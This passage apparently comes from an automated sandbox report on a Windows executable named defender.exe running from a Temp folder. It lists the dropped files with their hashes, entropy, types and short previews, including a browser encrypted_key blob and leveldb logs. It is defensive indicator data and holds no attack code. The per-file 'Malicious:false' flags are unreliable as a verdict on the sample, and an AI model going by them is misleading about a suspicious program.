                                                                    Category:dropped
                                                                    Size (bytes):2
                                                                    Entropy (8bit):1.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:Qn:Qn
                                                                    MD5:F3B25701FE362EC84616A93A45CE9998
                                                                    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                    Malicious:false
                                                                    Preview:..
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):389
                                                                    Entropy (8bit):5.593166102929949
                                                                    Encrypted:false
                                                                    SSDEEP:6:YKWCRgXt9RdrtybHV+vk/CzU5A/y+OttzcyEvzgEcYkvkkowNjBJhXqpRi7WGb1:YKWSg99rrt+1A1NyjgJvzg+61hfaGb1
                                                                    MD5:21D9EE56704515FFCCAACEAE73364E3B
                                                                    SHA1:E63363B2C94C3B74CA70BB76071830548FC8D0F9
                                                                    SHA-256:4065D690CD539D2443CE89BEE2E9905A316733420DB215ECFF0CC77B27B255E6
                                                                    SHA-512:6141560E1D79024A693556F08C7A257500D44730FFBD7343A0DCC3D7ACA7F8EBF7FDB0A97E683A2CCD574716432DD2F128AD8D9D040DFDDAA0CB6E4158AD3379
                                                                    Malicious:false
                                                                    Preview:{"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADb0wvCFkK9QZPr1SyT0UjDAAAAAAIAAAAAABBmAAAAAQAAIAAAADs/u+yww62kY9LDG5e0qdozxvxX8u1wHzcMWcgW6PaAAAAAAA6AAAAAAgAAIAAAACkCyCfxfMtoqTYb3jjAJyUlvyXN9N5PViIJ10isY2JsMAAAAEGE2Z3EFjU2YGf9Z76wyfDCUXZEPN/2/T/C0lkZaqHcddgcxbirR8bBj2gdinbNUUAAAAAuIe0ZvQy5iUh0jO3z9mwNTGuNybnxKLQrYwsZeseFrYvUVHzjzwbuYtWiopxZuKMwTuh0ETqq4tsYrsedyD0U"}}
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:JSON data
                                                                    Category:modified
                                                                    Size (bytes):57
                                                                    Entropy (8bit):4.283088322451805
                                                                    Encrypted:false
                                                                    SSDEEP:3:YWVbSZAjMx/ALfnH4JaGqx41n:YWNlDGn
                                                                    MD5:329622F40165883B656ABAB0D93674C4
                                                                    SHA1:DD0DDF3B58BA7BF841B7664F890C65DC7B20CE87
                                                                    SHA-256:2A2BF0F32B2E88B7394AB518C2EF85880824317076DCE7E932BB8C9B8F218488
                                                                    SHA-512:BF9173F47118D3FD466378CA186B74EFB7481AF15AEABD0BDBA43331721D93F5F9E4D1FD94F38873B8DBA9352D2EB4BF8044A21C52A52409615E3E25894393CF
                                                                    Malicious:false
                                                                    Preview:{"spellcheck":{"dictionaries":["en-GB"],"dictionary":""}}
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                    Category:dropped
                                                                    Size (bytes):8192
                                                                    Entropy (8bit):0.01057775872642915
                                                                    Encrypted:false
                                                                    SSDEEP:3:MsFl:/F
                                                                    MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                    SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                    SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                    SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                    Malicious:false
                                                                     Preview:
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):270336
                                                                    Entropy (8bit):8.280239615765425E-4
                                                                    Encrypted:false
                                                                    SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                    MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                    SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                    SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                    SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                    Malicious:false
                                                                     Preview:
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):8192
                                                                    Entropy (8bit):0.011852361981932763
                                                                    Encrypted:false
                                                                    SSDEEP:3:MsHlDll:/H
                                                                    MD5:0962291D6D367570BEE5454721C17E11
                                                                    SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                    SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                    SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                    Malicious:false
                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):8192
                                                                    Entropy (8bit):0.012340643231932763
                                                                    Encrypted:false
                                                                    SSDEEP:3:MsGl3ll:/y
                                                                    MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                    SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                    SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                    SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                    Malicious:false
                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                    Category:dropped
                                                                    Size (bytes):524656
                                                                    Entropy (8bit):5.027445846313988E-4
                                                                    Encrypted:false
                                                                    SSDEEP:3:LsulXYu:LsUY
                                                                    MD5:CD50C2E992CA425DA971988F4EB87395
                                                                    SHA1:DE99614207D3E2C0DE4395AE1A9EE2E86865393E
                                                                    SHA-256:DEBA0673B4F8CA786D51234093BB1E436081E5D638FF6C85BFD2E4631AADD2FD
                                                                    SHA-512:285387A2CAED6205C4A2CFFE6A4E432E8925F941AE3079B90ACE7CC7BDC362B3196BC340C710F2BE33CC70CF0AD1136B81272F69B90C7B8E9827E0DB064EBDFC
                                                                    Malicious:false
                                                                    Preview:........................................&...s}/.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):24
                                                                    Entropy (8bit):2.1431558784658327
                                                                    Encrypted:false
                                                                    SSDEEP:3:m+l:m
                                                                    MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                    SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                    SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                    SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                    Malicious:false
                                                                    Preview:0\r..m..................
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):48
                                                                    Entropy (8bit):2.9972243200613975
                                                                    Encrypted:false
                                                                    SSDEEP:3:NjItAyEIbG:oA9qG
                                                                    MD5:B579E3732EFD0DA165FBE9FF0CD0FD1E
                                                                    SHA1:DF17D620419F2C27E2340D924B1699829AC22C0A
                                                                    SHA-256:FD08D6BDF5BBAF819A78A6A35EB7A928CAFEE2E933137D4281B2ED221480FD53
                                                                    SHA-512:4D485F6EF37400395544BF3A607E61EF85BEB004EF6501C0D35BA46F0911B56C0D60F80F209C52D9606ADFBB6A2CC6FE0E9430F1D41FB40A4973E8BF8B2C4E1E
                                                                    Malicious:false
                                                                    Preview:(.......oy retne........................T.2.s}/.
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):48
                                                                    Entropy (8bit):2.9972243200613975
                                                                    Encrypted:false
                                                                    SSDEEP:3:NjItAyEIbG:oA9qG
                                                                    MD5:B579E3732EFD0DA165FBE9FF0CD0FD1E
                                                                    SHA1:DF17D620419F2C27E2340D924B1699829AC22C0A
                                                                    SHA-256:FD08D6BDF5BBAF819A78A6A35EB7A928CAFEE2E933137D4281B2ED221480FD53
                                                                    SHA-512:4D485F6EF37400395544BF3A607E61EF85BEB004EF6501C0D35BA46F0911B56C0D60F80F209C52D9606ADFBB6A2CC6FE0E9430F1D41FB40A4973E8BF8B2C4E1E
                                                                    Malicious:false
                                                                    Preview:(.......oy retne........................T.2.s}/.
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):24
                                                                    Entropy (8bit):2.1431558784658327
                                                                    Encrypted:false
                                                                    SSDEEP:3:m+l:m
                                                                    MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                    SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                    SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                    SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                    Malicious:false
                                                                    Preview:0\r..m..................
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):48
                                                                    Entropy (8bit):2.9972243200613975
                                                                    Encrypted:false
                                                                    SSDEEP:3:8lHyyEbaWY+n:8lHqba+
                                                                    MD5:2F04D90A309EC1EEB5C83B2641512B00
                                                                    SHA1:726BD3FB1F4245CBE081C8C4FE3C94C43F289883
                                                                    SHA-256:BC9CBA224F9567E3215AA1E4CA7648F634BFFB22EED6142A0B34FABFE4C8A25D
                                                                    SHA-512:C90EBF70E002A1EC51E8AC33A02ECD5D2D46C88D3ABD80972D045B92635A8576F18810D2311B7189CDCB6EFCB9B3E03F391B263EC20E559A1A379906DA58244B
                                                                    Malicious:false
                                                                    Preview:(...a.".oy retne........................G.2.s}/.
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):48
                                                                    Entropy (8bit):2.9972243200613975
                                                                    Encrypted:false
                                                                    SSDEEP:3:8lHyyEbaWY+n:8lHqba+
                                                                    MD5:2F04D90A309EC1EEB5C83B2641512B00
                                                                    SHA1:726BD3FB1F4245CBE081C8C4FE3C94C43F289883
                                                                    SHA-256:BC9CBA224F9567E3215AA1E4CA7648F634BFFB22EED6142A0B34FABFE4C8A25D
                                                                    SHA-512:C90EBF70E002A1EC51E8AC33A02ECD5D2D46C88D3ABD80972D045B92635A8576F18810D2311B7189CDCB6EFCB9B3E03F391B263EC20E559A1A379906DA58244B
                                                                    Malicious:false
                                                                    Preview:(...a.".oy retne........................G.2.s}/.
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                    Category:dropped
                                                                    Size (bytes):8192
                                                                    Entropy (8bit):0.01057775872642915
                                                                    Encrypted:false
                                                                    SSDEEP:3:MsFl:/F
                                                                    MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                    SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                    SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                    SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                    Malicious:false
                                                                    Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):270336
                                                                    Entropy (8bit):8.280239615765425E-4
                                                                    Encrypted:false
                                                                    SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                    MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                    SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                    SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                    SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                    Malicious:false
                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):8192
                                                                    Entropy (8bit):0.011852361981932763
                                                                    Encrypted:false
                                                                    SSDEEP:3:MsHlDll:/H
                                                                    MD5:0962291D6D367570BEE5454721C17E11
                                                                    SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                    SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                    SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                    Malicious:false
                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):8192
                                                                    Entropy (8bit):0.012340643231932763
                                                                    Encrypted:false
                                                                    SSDEEP:3:MsGl3ll:/y
                                                                    MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                    SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                    SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                    SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                    Malicious:false
                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                    Category:dropped
                                                                    Size (bytes):262512
                                                                    Entropy (8bit):9.47693366977411E-4
                                                                    Encrypted:false
                                                                    SSDEEP:3:LsNleKl/:Ls3Vl
                                                                    MD5:17487978C1CE4BD199A7161C412E9624
                                                                    SHA1:7ADB51748A2DF4BE529A4C47F9FA5702FE5A3E4B
                                                                    SHA-256:0EF0F28048A27134668CAFBED14EAED429AEE13AD44D5741C987AA0BC0F6F713
                                                                    SHA-512:7B3D3FEB1C6FD8057B78559BFC443F3733D1CED59997781F190B955E8762FFA4CFADB9315E82EDF5A020B743F6132C42E5B2AC5318BD8F301C13B6A3867515F8
                                                                    Malicious:false
                                                                    Preview:..........................................9.s}/.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                    Category:dropped
                                                                    Size (bytes):8192
                                                                    Entropy (8bit):0.01057775872642915
                                                                    Encrypted:false
                                                                    SSDEEP:3:MsFl:/F
                                                                    MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                    SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                    SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                    SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                    Malicious:false
                                                                    Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):270336
                                                                    Entropy (8bit):8.280239615765425E-4
                                                                    Encrypted:false
                                                                    SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                    MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                    SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                    SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                    SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                    Malicious:false
                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):8192
                                                                    Entropy (8bit):0.011852361981932763
                                                                    Encrypted:false
                                                                    SSDEEP:3:MsHlDll:/H
                                                                    MD5:0962291D6D367570BEE5454721C17E11
                                                                    SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                    SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                    SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                    Malicious:false
                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):8192
                                                                    Entropy (8bit):0.012340643231932763
                                                                    Encrypted:false
                                                                    SSDEEP:3:MsGl3ll:/y
                                                                    MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                    SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                    SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                    SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                    Malicious:false
                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                    Category:dropped
                                                                    Size (bytes):262512
                                                                    Entropy (8bit):9.553120663130604E-4
                                                                    Encrypted:false
                                                                    SSDEEP:3:LsNli2:Ls3
                                                                    MD5:FDB8030F9B7A44522A39A8D105CEDE96
                                                                    SHA1:3D0C2BDF14CDA5722721BD320198D71E64BD5DFD
                                                                    SHA-256:CBDAAAB3E64FEDF25EBA9D5D33E7D4411C5FAEE20A9438CB63847E3B1A73688C
                                                                    SHA-512:7D658F8641E1B7091790E7F10F96F8D107F166B355F2B2765238CABA0CBD9676D2160BA028388D09312B04C9E61878C81427504757664DAB63B679F600561AAD
                                                                    Malicious:false
                                                                    Preview:........................................a.8.s}/.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):389
                                                                    Entropy (8bit):5.593166102929949
                                                                    Encrypted:false
                                                                    SSDEEP:6:YKWCRgXt9RdrtybHV+vk/CzU5A/y+OttzcyEvzgEcYkvkkowNjBJhXqpRi7WGb1:YKWSg99rrt+1A1NyjgJvzg+61hfaGb1
                                                                    MD5:21D9EE56704515FFCCAACEAE73364E3B
                                                                    SHA1:E63363B2C94C3B74CA70BB76071830548FC8D0F9
                                                                    SHA-256:4065D690CD539D2443CE89BEE2E9905A316733420DB215ECFF0CC77B27B255E6
                                                                    SHA-512:6141560E1D79024A693556F08C7A257500D44730FFBD7343A0DCC3D7ACA7F8EBF7FDB0A97E683A2CCD574716432DD2F128AD8D9D040DFDDAA0CB6E4158AD3379
                                                                    Malicious:false
                                                                    Preview:{"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADb0wvCFkK9QZPr1SyT0UjDAAAAAAIAAAAAABBmAAAAAQAAIAAAADs/u+yww62kY9LDG5e0qdozxvxX8u1wHzcMWcgW6PaAAAAAAA6AAAAAAgAAIAAAACkCyCfxfMtoqTYb3jjAJyUlvyXN9N5PViIJ10isY2JsMAAAAEGE2Z3EFjU2YGf9Z76wyfDCUXZEPN/2/T/C0lkZaqHcddgcxbirR8bBj2gdinbNUUAAAAAuIe0ZvQy5iUh0jO3z9mwNTGuNybnxKLQrYwsZeseFrYvUVHzjzwbuYtWiopxZuKMwTuh0ETqq4tsYrsedyD0U"}}
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):16
                                                                    Entropy (8bit):3.2743974703476995
                                                                    Encrypted:false
                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                    Malicious:false
                                                                    Preview:MANIFEST-000001.
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):16
                                                                    Entropy (8bit):3.2743974703476995
                                                                    Encrypted:false
                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                    Malicious:false
                                                                    Preview:MANIFEST-000001.
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):255
                                                                    Entropy (8bit):5.2380283439361595
                                                                    Encrypted:false
                                                                    SSDEEP:6:PwwkXFQQ1cNwiaZ5p2jM8B2KLlJwwzvIq2PcNwiaZ5p2jMGIFUv:oHtNHOFLg8vIvLNHhFUv
                                                                    MD5:CBAEE12ACC58D26CE7E06266EC27DAA0
                                                                    SHA1:6899C1CF0E08ECBAFC6F01B4DAF58141658AB409
                                                                    SHA-256:C23CF0A90FD0153DBC26919C8F485948780AB9A6EE06AB170178B94DC3104826
                                                                    SHA-512:2B13B114F5EC968F56CC811FA4CFDC36A652BAACBD7917831525F4878D1F1AE24EB3E5849E1F5693293CC6E3BE5F427D472CA5984FCA1D9E359F7C1C92809900
                                                                    Malicious:false
                                                                    Preview:2024/08/04-11:35:16.722 5e0 Creating DB C:\Users\user\AppData\Roaming\defender\Local Storage\leveldb since it was missing..2024/08/04-11:35:16.756 5e0 Reusing MANIFEST C:\Users\user\AppData\Roaming\defender\Local Storage\leveldb/MANIFEST-000001.
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:OpenPGP Secret Key
                                                                    Category:dropped
                                                                    Size (bytes):41
                                                                    Entropy (8bit):4.704993772857998
                                                                    Encrypted:false
                                                                    SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                    MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                    SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                    SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                    SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                    Malicious:false
                                                                    Preview:.|.."....leveldb.BytewiseComparator......
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):59
                                                                    Entropy (8bit):4.619434150836742
                                                                    Encrypted:false
                                                                    SSDEEP:3:YLbkVKJq0nMb1KKtiVY:YHkVKJTnMRK3VY
                                                                    MD5:2800881C775077E1C4B6E06BF4676DE4
                                                                    SHA1:2873631068C8B3B9495638C865915BE822442C8B
                                                                    SHA-256:226EEC4486509917AA336AFEBD6FF65777B75B65F1FB06891D2A857A9421A974
                                                                    SHA-512:E342407AB65CC68F1B3FD706CD0A37680A0864FFD30A6539730180EDE2CDCD732CC97AE0B9EF7DB12DA5C0F83E429DF0840DBF7596ACA859A0301665E517377B
                                                                    Malicious:false
                                                                    Preview:{"net":{"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):59
                                                                    Entropy (8bit):4.619434150836742
                                                                    Encrypted:false
                                                                    SSDEEP:3:YLbkVKJq0nMb1KKtiVY:YHkVKJTnMRK3VY
                                                                    MD5:2800881C775077E1C4B6E06BF4676DE4
                                                                    SHA1:2873631068C8B3B9495638C865915BE822442C8B
                                                                    SHA-256:226EEC4486509917AA336AFEBD6FF65777B75B65F1FB06891D2A857A9421A974
                                                                    SHA-512:E342407AB65CC68F1B3FD706CD0A37680A0864FFD30A6539730180EDE2CDCD732CC97AE0B9EF7DB12DA5C0F83E429DF0840DBF7596ACA859A0301665E517377B
                                                                    Malicious:false
                                                                    Preview:{"net":{"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                    Process:C:\Users\user\AppData\Local\Temp\2goCimWNF4MQsElUG17heiczRtP\defender.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):57
